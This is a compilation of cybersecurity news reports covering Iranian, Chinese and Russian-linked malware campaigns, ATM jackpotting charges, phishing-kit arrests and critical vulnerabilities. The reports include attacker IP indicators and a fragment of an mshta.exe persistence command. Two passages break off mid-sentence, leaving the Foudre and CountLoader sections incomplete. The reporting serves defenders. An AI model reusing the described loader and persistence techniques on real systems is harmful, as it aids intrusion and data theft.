2025-12-22 AI创业新闻
Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence
Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey. “The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.” Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant. The group has also managed to remain elusive, attracting little attention, unlike other Iranian groups such as Charming Kitten , MuddyWater , and OilRig .
Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails. The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.
The attack chains have also witnessed a shift from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient. In addition, Foudre and Tonnerre artifacts are known to validate if the C2 domain is authentic by downloading an RSA signature file, which the malware then decrypts using a public key and compares with a locally-stored validation file. SafeBreach’s analysis of the C2 infrastructure has also uncovered a directory named “key” that’s used for C2 validation, along with other folders to store communication logs and the exfiltrated files.
“Every day, Foudre downloads a dedicated signature file encrypted with an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify that this domain is an approved domain,” Bar said. “The request’s format is:
‘https://
The group has two members: a Telegram bot “ @ttestro1bot “ that’s likely used to issue commands and collect data, and a user with the handle “ @ehsan8999100 .” While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” in the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs. Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020 - A version of Foudre camouflaged as Amaq News Finder to download and execute the malware A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content A variation of malware called Deep Freeze, similar to Amaq News Finder, is used to infect victims with Foudre An unknown malware called Rugissement “Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.” The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.
“APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said . “The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different “projects” under the same internal ticketing regime.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
U.S. DOJ Charges 54 in ATM Jackpotting Scheme Using Ploutus Malware
The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme. The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash.
The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department. In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.” The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering.
Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates. Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.” If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison. “These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R.
Galeotti of the Justice Department’s Criminal Division. The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response. Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive.
The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals. “The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.” Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how a weakness in Windows XP-based ATMs could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS to compromised ATMs.
A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions. “Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.” According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.
“Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Russia-Linked Hackers Use Microsoft 365 Device Code Phishing for Account Takeovers
A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare . The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.
“Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said . As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document. However, doing so redirects the user to the legitimate Microsoft device code login URL, where, once the previously provided code is entered, it causes the service to generate an access token that can then be recovered by the three actors to take control of the victim account.
Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors that abuse the device code authentication flow. Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations. Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts.
This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish . “Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.” To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users.
If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.
The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.” To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain. It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI).
If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe
“Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.” YouTube Ghost Network Delivers GachiLoader The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network , a network of compromised YouTube accounts that engage in malware distribution. “One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said . “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.” As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220,000 views.
These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google. In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.
It also verifies if it’s running in an elevated context by executing the “net session” command. In the event the execution fails, it attempts to start itself with admin privileges, which, in turn, triggers a User Account Control ( UAC ) prompt. There are high chances that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader. In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender , and configures Defender exclusions to avoid the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users\, C:\ProgramData\, and C:\Windows).
GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling . “The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
WatchGuard Warns of Active Exploitation of Critical Fireware OS VPN Vulnerability
WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks. Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code. “This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory. “If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.” The vulnerability impacts the following versions of Fireware OS - 2025.1 - Fixed in 2025.1.4 12.x - Fixed in 12.11.6 12.5.x (T15 & T35 models) - Fixed in 12.5.15 12.3.1 (FIPS-certified release) - Fixed in 12.3.1_Update4 (B728352) 11.x (11.10.2 up to and including 11.12.4_Update1) - End-of-Life WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses - 45.95.19[.]50 51.15.17[.]89 172.93.107[.]67 199.247.7[.]82 Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).
The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected - A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes) During a successful exploit, the iked process will hang, interrupting VPN connections After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. It’s currently not known if these two sets of attacks are related.
Users are advised to apply the updates as soon as possible to secure against the threat. As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Pentesting With Proof. Zero-Day, Zero-Pay and the #1 AI Hacker Behind It
Nigeria Arrests RaccoonO365 Phishing Developer Linked to Microsoft 365 Attacks
Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme. The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure. “Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media. In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences.
The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF. The arrests were carried out following raids in Lagos and Edo states. RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.
Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024. The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.
These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added. A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information. The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as commit intellectual property violations, the lawsuit alleged. The lawsuit also identified Ogundipe as the mastermind behind the operation.
His present whereabouts are unclear. When reached for comment, a Microsoft spokesperson told The Hacker News that investigations are ongoing. The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S.
government entities. Darcula and associates are estimated to have stolen nearly 900,000 credit card numbers, including nearly 40,000 from Americans, according to an investigation from the Norwegian Broadcasting Corporation (NRK) and cybersecurity company Mnemonic. The Chinese-language phishing kit first emerged in July 2023. News of the lawsuit was first reported by NBC News on December 17, 2025.
The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
New UEFI Flaw Enables Early-Boot DMA Attacks on ASRock, ASUS, GIGABYTE, MSI Motherboards
Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access ( DMA ) attacks across architectures that implement a Unified Extensible Firmware Interface ( UEFI ) and input–output memory management unit ( IOMMU ). UEFI and IOMMU are designed to enforce a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices can manipulate or inspect system memory before the operating system is loaded. The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.
“This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory. “As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.” Successful exploitation of the vulnerability could allow a physically present attacker to enable pre-boot code injection on affected systems running unpatched firmware and access or alter system memory via DMA transactions, much before the operating system kernel and its security features are loaded. The vulnerabilities that enable a bypass of early-boot memory protection are listed below - CVE-2025-14304 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets CVE-2025-11901 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets CVE-2025-14302 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026) CVE-2025-14303 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat. “In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said.
“Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.” Update Riot Games, in a separate post, said the critical flaw could be exploited for injecting code, adding how the privileged state associated with the early boot sequence can be manipulated before the operating system running on the machine can activate its security controls. “This issue allowed hardware cheats to potentially inject code unnoticed, even when security settings on the host appeared to be enabled,” Al-Sharifi said , describing it as a “Sleeping Bouncer” problem. While Pre-Boot DMA Protection is designed as a way to prevent rogue DMA access to a system’s memory using IOMMU early on in the boot sequence, the vulnerability stems from the firmware incorrectly signaling to the operating system that this feature was fully active, when it was failing to initialize the IOMMU correctly during early boot. “This meant that while ‘Pre-Boot DMA Protection’ settings appeared to be enabled in the BIOS, the underlying hardware implementation wasn’t fully initializing the IOMMU during the earliest seconds of the boot process,” Al-Sharifi added.
“In essence, the system’s ‘bouncer’ appeared to be on duty, but was actually asleep in the chair. So by the time the system is fully loaded, it can’t be 100% confident that zero integrity-breaking code was injected via DMA.” This brief exploitation window can pave the way for a “sophisticated hardware cheat” to get in, gain elevated privileges, and conceal itself without raising any red flags. “By closing this pre-boot loophole, we are neutralizing an entire class of previously untouchable cheats and significantly raising the cost of unfair play,” Riot Games noted. Although the vulnerability has been framed from the point of view of the gaming sector, the security risk extends to any attack that can abuse the physical access to inject malicious code.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
China-Aligned Threat Group Uses Windows Group Policy to Deploy Espionage Malware
A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. The end goal of these attacks is cyber espionage, Slovak cybersecurity company ESET said in a report published today. The threat activity cluster has been assessed to be active since at least September 2023. “LongNosedGoblin uses Group Policy to deploy malware across the compromised network, and cloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C&C) servers,” security researchers Anton Cherepanov and Peter Strýček said .
Group Policy is a mechanism for managing settings and permissions on Windows machines. According to Microsoft, Group Policy can be used to define configurations for groups of users and client computers, as well as manage server computers. The attacks are characterized by the use of a varied custom toolset that mainly consists of C#/.NET applications - NosyHistorian, to collect browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox NosyDoor, a backdoor that uses Microsoft OneDrive as C&C and executes commands that allow it to exfiltrate files, delete files, and execute shell commands NosyStealer, to exfiltrate browser data from Google Chrome and Microsoft Edge to Google Drive in the form of an encrypted TAR archive NosyDownloader, to download and run a payload in memory, such as NosyLogger NosyLogger, a modified version of DuckSharp that’s used to log keystrokes NosyDoor execution chain ESET said it first detected activity associated with the hacking group in February 2024 on a system of a governmental entity in Southeast Asia, eventually finding that Group Policy was used to deliver the malware to multiple systems from the same organization. The exact initial access methods used in the attacks are presently unknown.
“In most cases we investigated, the attackers were already inside the network, so we could not determine the initial access method they used,” Cherepanov, a senior malware researcher at ESET, told The Hacker News. Further analysis has determined that while many victims were affected by NosyHistorian between January and March 2024, only a subset of these victims were infected with NosyDoor, indicating a more targeted approach. In some cases, the dropper used to deploy the backdoor using AppDomainManager injection has been found to contain “execution guardrails” that are designed to limit operation to specific victims’ machines. Also employed by LongNosedGoblin are other tools like a reverse SOCKS5 proxy, a utility that’s used to run a video recorder to capture audio and video, and a Cobalt Strike loader.
The cybersecurity company noted that the threat actor’s tradecraft shares tenuous overlaps with clusters tracked as ToddyCat and Erudite Mogwai , but emphasized the lack of definitive evidence linking them together. That said, the similarities between NosyDoor and LuckyStrike Agent and the presence of the phrase “Paid Version” in the PDB path of LuckyStrike Agent have raised the possibility that the malware may be sold or licensed to other threat actors. “We later identified another instance of a NosyDoor variant targeting an organization in an E.U. country, once again employing different TTPs, and using the Yandex Disk cloud service as a C&C server,” the researchers noted.
“The use of this NosyDoor variant suggests that the malware may be shared among multiple China-aligned threat groups.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
HPE OneView Flaw Rated CVSS 10.0 Allows Unauthenticated Remote Code Execution
Hewlett Packard Enterprise (HPE) has resolved a maximum-severity security flaw in OneView Software that, if successfully exploited, could result in remote code execution. The critical vulnerability, assigned the CVE identifier CVE-2025-37164 , carries a CVSS score of 10.0. HPE OneView is an IT infrastructure management software that streamlines IT operations and controls all systems via a centralized dashboard interface. “A potential security vulnerability has been identified in Hewlett Packard Enterprise OneView Software.
This vulnerability could be exploited, allowing a remote unauthenticated user to perform remote code execution,” HPE said in an advisory issued this week. It affects all versions of the software prior to version 11.00 , which addresses the flaw. The company has also made available a hotfix that can be applied to OneView versions 5.20 through 10.20. It’s worth noting that the hotfix must be reapplied after upgrading from version 6.60 or later to version 7.00.00, or after any HPE Synergy Composer reimaging operations.
Separate hotfixes are available for the OneView virtual appliance and Synergy Composer2. Although HPE makes no mention of the flaw being exploited in the wild, it’s essential that users apply the patches as soon as possible for optimal protection. Earlier this June, the company also released updates to fix eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. It also shipped OneView version 10.00 to remediate a number of known flaws in third-party components, such as Apache Tomcat and Apache HTTP Server.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ThreatsDay Bulletin: WhatsApp Hijacks, MCP Leaks, AI Recon, React2Shell Exploit and 15 More Stories
This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from. From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become. Here’s the full rundown of what moved in the cyber world this week.
International scam ring busted Fraudulent Call Centers Disrupted in Ukraine Authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, along with Eurojust, took action against a criminal network operating call centers in Dnipro, Ivano-Frankivsk, and Kyiv that scammed more than 400 victims across Europe out of more than €10 million ($11.7 million). “The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam,” Eurojust said . “The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked. They convinced their victims to transfer large sums of money from their ‘compromised’ bank accounts to ‘safe’ bank accounts controlled by the network.
They also lured victims into downloading remote access software and entering their banking details, enabling the criminal group to access and control the victims’ bank accounts.” The call centers employed approximately 100 people and were recruited from the Czech Republic, Latvia, Lithuania, and other countries. They played different roles, ranging from making calls and forging official certificates from the police and banks to collecting cash from their victims. Employees who successfully managed to obtain money from their victims would receive up to 7% of the proceeds to encourage them to continue the scam. The criminal enterprise also promised cash bonuses, cars, or apartments in Kyiv for employees who obtained more than €100,000.
The operation led to the arrest of 12 suspects on December 9, 2025. Authorities also seized cash, 21 vehicles, and various weapons and ammunition. UK nudity filter push U.K. to Encourage Apple and Google to Put Nudity-Blocking Systems on Phones The U.K.
government reportedly will “encourage” Apple and Google to prevent phones from displaying nude images except when users verify that they are adults. According to a new report from The Financial Times, the push for nudity-detection won’t be a legal requirement “for now,” but is said to be part of the government’s strategy to tackle violence against women and girls. “The U.K. government wants technology companies to block explicit images on phones and computers by default to protect children, with adults having to verify their age to create and access such content,” the report said .
“Ministers want the likes of Apple and Google to incorporate nudity-detection algorithms into their device operating systems to prevent users from taking photos or sharing images of genitalia unless they are verified as adults.” Modular infostealer emerges New SantaStealer Spotted A new, modular information stealer named SantaStealer is being advertised by Russian-speaking operators on Telegram and underground forums like Lolz. “The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection,” Rapid7 said . “Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.” SantaStealer uses 14 distinct data-collection modules, each running in its own thread and exfiltrating the stolen information. It also uses an embedded DLL to bypass Chrome’s app-bound encryption protections and harvest browser credentials, including passwords, cookies, and saved credit cards from the web browser.
Assessed to be a rebranding of BluelineStealer, the malware is available for $175 per month for a basic plan and $300 per month for a premium plan that lets customers edit execution delays and enable clipper functionality to substitute wallet addresses copied to the clipboard with an attacker-controlled one to reroute transactions. The threat actor has been active on Telegram since at least July 2025. Bulletproof hosting exposed Deep Dive on BPH Providers Threat actors leveraging Bulletproof Hosting (BPH) providers move faster than defenders can respond, often migrating operations, re-registering domains, and re-establishing services within hours of takedowns, Silent Push said in a new exhaustive analysis of BPH services. “Without knowledge of where this infrastructure shifts, takedowns lack the permanence they need,” Silent Push said .
“And without a coordinated shift in both regulatory pressure and the law-enforcement action aimed at these providers, […] Bulletproof Hosting as a service will continue to thrive – as will the malicious operations built on top of it.” C2 servers tracked DDoSia Infrastructure Analysis An analysis of DDoSia’s multi-layered command-and-control (C2) infrastructure has revealed an average of 6 control servers active at any given time. “However, servers typically have a relatively short lifespan — averaging 2.53 days,” Censys said . “Some servers we have observed are active for over a week, but most instances we only see for less than a few hours.” DDoSia is a participatory distributed denial-of-service (DDoS) capability built by Russian hacktivists in 2022, coinciding with the early days of the Russo-Ukrainian war. It’s operated by the pro-Russian hacktivist group NoName057(16), which was taken down earlier this July.
It has since made a comeback. Targeting of DDoSia is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors. WhatsApp hijack campaign GhostPairing Attack Hijacks WhatsApp Accounts Threat actors are using a new social engineering technique to hijack WhatsApp accounts. The new GhostPairing attack lures victims by sending messages from compromised accounts that contain a link to a Facebook-style preview.
Clicking on the link takes the victim to a page that imitates a Facebook viewer and asks them to verify before the content can be served. As part of this step, they are asked to scan a QR code that will link an attacker’s browser to the victim’s WhatsApp account, granting them unauthorized access to the victim’s account. “To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page. The victim would then be told to open WhatsApp, go to Linked devices, and scan that QR in order to ‘view the photo,’” Gen Digital said .
Alternately, they are instructed to enter their phone number on the bogus page, which then forwards that number to WhatsApp’s legitimate “link device via phone number” feature. Once WhatsApp generates a pairing numeric code, it’s relayed back to the fake page, along with instructions to enter the code into WhatsApp to confirm a login. The earliest sightings of the attack have been detected in Czechia. The attack, which abuses the legitimate device-linking feature on the platform, is a variation of a technique that was used by Russian state-sponsored actors to intercept Signal and WhatsApp messages earlier this year.
